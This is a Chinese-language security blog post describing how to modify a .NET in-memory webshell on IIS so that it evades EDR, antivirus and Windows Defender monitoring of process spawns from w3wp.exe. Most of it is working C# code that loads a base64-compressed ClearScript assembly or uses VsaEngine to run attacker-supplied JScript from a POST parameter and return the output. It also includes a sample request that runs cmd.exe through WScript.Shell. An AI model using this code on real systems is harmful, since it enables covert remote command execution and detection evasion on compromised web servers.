.Net 内存马改造

鸿鹄实验室

发布于 2021-12-08 19:37:33

1.2K0

发布于 2021-12-08 19:37:33

前几天发了一篇关于.net内存马的文章：

里面的详细的介绍了其利用方式，在学习的过程中发现，其中的参考文章提到了直接使用Start Pocess的方式会被wdf检查： Since ProxyLogon, ProxyShell, and till now some EDRs,AV,sysmon and Microsoft Windows Defender try to catch and prevent process spawn from w3wp.exe process. This also annoys us but we need some improvements to overcome it!

然后提到了利用jscript来绕过的方法。实现该功能的方法有很多，第一种就是直接了当的DLR技术：

String script = postParams[pass];String encoded_compressed_file = @"dll的base64";var outputStream = new MemoryStream(Convert.FromBase64String(encoded_compressed_file));DeflateStream l_Stream = new DeflateStream(outputStream, CompressionMode.Decompress);var UncompressedFileBytes = new byte[478720];l_Stream.Read(UncompressedFileBytes, 0, 478720);Assembly assem = Assembly.Load(UncompressedFileBytes);Type jscriptengineType = assem.GetType("Microsoft.ClearScript.Windows.JScriptEngine");Type xhostType = assem.GetType("Microsoft.ClearScript.ExtendedHostFunctions");object jscriptengine = Activator.CreateInstance(jscriptengineType);object xhost = Activator.CreateInstance(xhostType);PropertyInfo reflection = jscriptengineType.GetProperty("AllowReflection");reflection.SetValue(jscriptengine, false);jscriptengineType.InvokeMember("AddHostObject", BindingFlags.InvokeMethod, null, jscriptengine, new[] { "xHost", xhost });jscriptengineType.InvokeMember("Execute", BindingFlags.InvokeMethod, null, jscriptengine, new[] { script });

效果：

-H "Type: cmd"  -d "pass=new ActiveXObject('Wscript.Shell').Exec('cmd.exe /c calc.exe')"

上述办法不太适合webshell使用，因为回显不好弄，C2的话就好说了，改写成ps的就可以获取输出了，我们用下面的方法：

Microsoft.JScript.Vsa.VsaEngine vsaEngine = Microsoft.JScript.Vsa.VsaEngine.CreateEngine();script = Encoding.ASCII.GetString(Encoding.UTF8.GetBytes(script));object obj = Microsoft.JScript.Eval.JScriptEvaluate(script,vsaEngine);byte[] data = Encoding.UTF8.GetBytes((string) obj);response.StatusCode = 200;response.ContentLength64 = data.Length;stm = response.OutputStream;stm.Write(data, 0, data.Length);

效果如下：